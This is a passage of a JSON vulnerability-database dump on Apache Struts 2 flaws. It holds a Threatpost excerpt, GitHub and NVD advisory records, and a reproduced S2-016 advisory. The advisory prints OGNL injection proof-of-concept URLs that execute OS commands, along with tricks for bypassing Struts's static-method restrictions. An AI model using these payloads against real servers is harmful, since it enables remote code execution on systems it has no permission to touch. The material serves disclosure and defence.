error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "exploitpack", "title": "Apache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-14T00:00:00", "id": "EXPLOITPACK:C0CFCAABB02FC4AC5D0EF38D381E1E35", "href": "", "sourceData": "CVE Number: CVE-2013-2251\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\nAffected Software: Apache Struts v2.0.0 - 2.3.15\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\nIssue ID by Vender: S2-016\n\nOverview:\n Struts2 is an open-source web application framework for Java.\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\n leads to arbitrary Java method execution on the target server. This is\n caused by insecure handling of prefixed special parameters (action:,\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\n\nDetails:\n <About DefaultActionMapper>\n\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\n request and action to be executed on the server. DefaultActionMapper is\n a default implementation of ActionMapper. It handles four types of\n prefixed parameters: action:, redirect:, redirectAction: and method:.\n\n For example, redirect prefix is used for HTTP redirect.\n\n Normal redirect prefix usage in JSP:\n <s:form action=\"foo\">\n ...\n <s:submit value=\"Register\"/>\n <s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/>\n </s:form>\n\n If the cancel button is clicked, redirection is performed.\n\n Request URI for redirection:\n /foo.action?redirect:http://www.google.com/\n\n Resopnse Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/\n\n Usage of other prefixed parameters is similar to redirect.\n See Struts2 document for details.\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\n\n <How the Attack Works>\n\n As stated already, there are four types of prefixed parameters.\n\n action:, redirect:, redirectAction:, method:\n\n All except for method: can be used for attacks. But regarding action:,\n it can be used only if wildcard mapping is enabled in configuration.\n On the one hand, redirect: and redirectAction: are not constrained by\n configuration (thus they are convenient for attackers).\n\n One thing that should be noted is that prefixed parameters are quite\n forceful. It means that behavior of application which is not intended\n to accept prefixed parameters can also be overwritten by prefixed\n parameters added to HTTP request. Therefore all Struts2 applications\n that use DefaultActionMapper are vulnerable to the attack.\n\n The injection point is name of prefixed parameters.\n Example of attack using redirect: is shown below.\n\n Attack URI:\n /bar.action?redirect:http://www.google.com/%25{1000-1}\n\n Response Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/999\n\n As you can see, expression (1000-1) is evaluated and the result (999)\n is appeared in Location response header. As I shall explain later,\n more complex attacks such as OS command execution is possible too.\n\n In DefaultActionMapper, name of prefixed parameter is once stored as\n ActionMapping object and is later executed as OGNL expression.\n Rough method call flow in execution phase is as the following.\n\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\n\nProof of Concept:\n <PoC URLs>\n\n PoC is already disclosed on vender's web page.\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n\n Below PoC URLs are just quotes from the vender's page.\n\n Simple Expression:\n http://host/struts2-blank/example/X.action?action:%25{3*4}\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\n\n OS Command Execution:\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n\n Obviously such attacks are not specific to blank/showcase application,\n but all Struts2 based applications may be subject to attacks.\n\n <OS Command Execution and Static Method Call>\n\n Another topic that I think worth mentioning is that PoC URLs use\n ProcessBuilder class to execute OS commands. The merit of using this\n class is that it does not require static method to execute OS commands,\n while Runtime class does require it.\n\n As you may know, static method call in OGNL is basically prohibited.\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\n a simple trick:\n\n %{#_memberAccess['allowStaticMethodAccess']=true,\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\n prevent the trick. However there are still some techniques to call\n static method in OGNL.\n\n One technique is to use reflection to replace static method call to\n instance method call. Another technique is to overwrite #_memberAccess\n object itself rather than property of the object:\n\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n Probably prevention against static method is just an additional layer\n of defense, but I think that global objects such as #_memberAccess\n should be protected from rogue update.\n\nTimeline:\n 2013/06/24 Reported to Struts Security ML\n 2013/07/17 Vender announced v2.3.15.1\n 2013/08/10 Disclosure of this advisory\n\nRecommendation:\n Immediate upgrade to the latest version is strongly recommended as\n active attacks have already been observed. It should be noted that\n redirect: and redirectAction: parameters were completely dropped and\n do not work in the latest version as stated in the vender's page.\n Thus attention for compatibility issues is required for upgrade.\n\n If you cannot upgrade your Struts2 immediately, filtering (by custom\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\n this vulnerability. Some points about filtering solution are listed\n below.\n\n - Both %{expr} and ${expr} notation can be used for attacks.\n - Parameters both in querystring and in request body can be used.\n - redirect: and redirectAction: can be used not only for Java method\n execution but also for open redirect.\n\n See S2-017 (CVE-2013-2248) for open redirect issue.\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\n\nReference:\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n https://cwiki.apache.org/confluence/display/WW/ActionMapper", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "github": [{"lastseen": "2023-09-27T22:06:16", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.", "cvss3": {}, "published": "2022-05-14T01:57:02", "type": "github", "title": "Arbitrary code execution in Apache Struts 2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2023-08-16T09:30:59", "id": "GHSA-GQQM-564F-VVXQ", "href": "https://github.com/advisories/GHSA-gqqm-564f-vvxq", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T22:06:41", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.", "cvss3": {}, "published": "2022-05-14T00:54:14", "type": "github", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2023-02-01T05:04:18", "id": "GHSA-HMHQ-382Q-MP56", "href": "https://github.com/advisories/GHSA-hmhq-382q-mp56", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-09-27T22:06:41", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:16", "type": "github", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2023-02-01T05:04:26", "id": "GHSA-PRJV-JJ26-WF8H", "href": "https://github.com/advisories/GHSA-prjv-jj26-wf8h", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-27T22:06:41", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "github", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2023-02-01T05:04:17", "id": "GHSA-3C5C-XRQ4-QHR8", "href": "https://github.com/advisories/GHSA-3c5c-xrq4-qhr8", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-14T23:36:58", "description": "The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2022-05-17T01:42:17", "type": "github", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2023-08-14T22:56:16", "id": "GHSA-2RVH-Q539-Q33V", "href": "https://github.com/advisories/GHSA-2rvh-q539-q33v", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-17T01:09:02", "description": "When the Struts2 debug mode is turned on, under certain conditions an arbitrary script may be executed in the 'Problem Report' screen. Also if JSP files are exposed to be accessed directly it's possible to execute an arbitrary script. \n\nIt is generally not advisable to have debug mode switched on outside of the development environment. Debug mode should always be turned off in production setup. Also never expose JSPs files directly and hide them inside WEB-INF folder or define dedicated security constraints to block access to raw JSP files.\n\nStruts >= 2.3.20 is not vulnerable to this attack. We recommend upgrading to Struts 2.3.20 or higher.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-05-14T01:57:02", "type": "github", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2023-02-01T05:04:26", "id": "GHSA-VWHV-J36G-5RM8", "href": "https://github.com/advisories/GHSA-vwhv-j36g-5rm8", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-23T14:50:40", "description": "In Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T19:35:40", "type": "github", "title": "Apache Struts 2.0.1 uses an unintentional expression in a Freemarker tag instead of string literal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2023-01-09T05:02:49", "id": "GHSA-8FX9-5HX8-CRHM", "href": "https://github.com/advisories/GHSA-8fx9-5hx8-crhm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-22T22:10:22", "description": "Multiple Cross-Site Scripting (XSS) in XWork generated error pages in Apache Struts. By default, XWork doesn't escape action's names in automatically generated error page, allowing for a successful XSS attack. When Dynamic Method Invocation (DMI) is enabled, the action name is generated dynamically base on request parameters. This allows to call non-existing page and method to produce error page with injected code as below. As of Struts 2.2.3 the action names are escaped when automatically generated error pages are rendered.", "cvss3": {}, "published": "2022-05-17T05:35:28", "type": "github", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2023-02-01T05:04:19", "id": "GHSA-56F8-G68R-J699", "href": "https://github.com/advisories/GHSA-56f8-g68r-j699", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T01:04:41", "description": "The Struts 2 action mapping mechanism supports the special parameter prefix action: which is intended to help with attaching navigational information to buttons within forms, under certain conditions this can be used to bypass security constraints. \n\nIn Struts 2.3.15.3 the action mapping mechanism was changed to avoid circumventing security constraints. Two additional constants were introduced to steer behaviour of DefaultActionMapper:\n\n- struts.mapper.action.prefix.enabled - when set to false support for \"action:\" prefix is disabled, set to false by default\n- struts.mapper.action.prefix.crossNamespaces - when set to false, actions defined with \"action:\" prefix must be in the same namespace as current action\n\n", "cvss3": {}, "published": "2022-05-17T04:44:52", "type": "github", "title": "Apache Struts2 Broken Access Control Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2023-08-15T19:02:22", "id": "GHSA-Q5Q8-JGHF-3PM3", "href": "https://github.com/advisories/GHSA-q5q8-jghf-3pm3", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-08-16T05:26:48", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.", "cvss3": {}, "published": "2022-05-14T02:50:59", "type": "github", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2023-08-16T05:02:13", "id": "GHSA-H4V9-JF2R-9H6M", "href": "https://github.com/advisories/GHSA-h4v9-jf2r-9h6m", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:56:47", "description": "Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-05-14T01:57:01", "type": "github", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4003"], "modified": "2023-02-01T05:04:17", "id": "GHSA-M3X6-9V6H-4G28", "href": "https://github.com/advisories/GHSA-m3x6-9v6h-4g28", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T01:06:34", "description": "ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings. Applying better regex which includes pattern to exclude request parameters trying to use top object. This issue was patched in Struts 2.3.24.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-14T03:15:08", "type": "github", "title": "Special top object can be used to access Struts' internals", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-02-01T05:04:27", "id": "GHSA-4QGJ-9MVG-3929", "href": "https://github.com/advisories/GHSA-4qgj-9mvg-3929", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-09-28T05:29:50", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.", "cvss3": {}, "published": "2013-07-16T18:55:00", "type": "cve", "title": "CVE-2013-2134", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2018-11-23T15:54:00", "cpe": [], "id": "CVE-2013-2134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-09-28T05:23:43", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-07-10T19:55:00", "type": "cve", "title": "CVE-2013-2115", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2020-09-24T13:28:00", "cpe": ["cpe:/a:apache:struts:2.3.14.1"], "id": "CVE-2013-2115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2115", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-29T10:45:37", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.", "cvss3": {}, "published": "2014-05-08T10:55:00", "type": "cve", "title": "CVE-2014-0116", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2019-08-12T21:15:00", "cpe": ["cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.0.3", 